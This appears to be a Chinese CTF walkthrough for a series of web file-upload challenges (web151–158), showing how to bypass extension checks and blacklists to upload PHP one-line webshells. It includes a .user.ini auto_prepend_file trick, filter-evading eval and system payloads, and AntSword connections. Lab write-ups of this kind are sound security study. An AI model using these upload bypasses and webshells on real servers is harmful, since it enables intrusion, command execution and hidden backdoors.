web151
开启容器

前台校验
直接上传包含一句话木马的shell.php
发现有后缀限制

提示前台校验F12修改源代码 exts后面png改为php 这样就可以上传php的文件了,然后蚁剑直接连接


用蚁剑链接




web152
开启容器

提示后端校验要严密
直接上传php无法成功
尝试可以上传成功png

进行抓包
就是要传图片格式,抓个包传个png的图片 然后bp抓包修改php后缀解析 然后放包 显示上传成功 蚁剑连即可。



web153
开启容器

.htaccess在绕过文件上传的限制中,通常在 Apache 全局配置文件 httpd.conf 中有这样一条配置:AddType application/x-httpd-php .php .phtml或者
SetHandler application/x-httpd-php 将所有文件都解析为 php 文件
这里我们尝试.htaccess(因为它只适用于Apache)所以不行,这里要使用.user.ini
php.ini 是 php 的一个全局配置文件,对整个 web 服务起作用;而.user.ini 和.htaccess 一样是目录的配置文件,.user.ini 就是用户自定义的一个 php.ini,通常用这个文件来构造后门和隐藏后门。
这里先上传一个内容为:auto_prepend_file=1.png得png,然后在正常传一个带图片得一句话木马即可。接下来就会将1.png转化为php
先创建一个配置文件
1 | auto_prepend_file = 1.png |

后创建一个1.png文件
1 |
|

第一个需要抓包上传,将.png删除



蚁剑链接

web154
开启容器
这里其他与上题一样,多了个php黑名单过滤
1 | <script languoge="PHP"> |
1 | eval($_POST[a]); |



web155
开启容器

方法和上一题一样,ok在做一遍 老样子先上传.user.ini.png 和1.png然后直接访问/upload/index.php/即可。


web156
开启容器
考点:过滤字符[],[]可以可以使用{}代替。
这里也很简单 段标签的基础上改成{}即可 <?=eval($_POST{a});?

web157
开启容器
考点:过滤字符串 过滤了{}和 ;
可以把语句用括号()包含
这里可以使用命令执行:<?=(system("tac ../fl*"))?> 直接访问/upload/

web158
开启容器
与上题一样
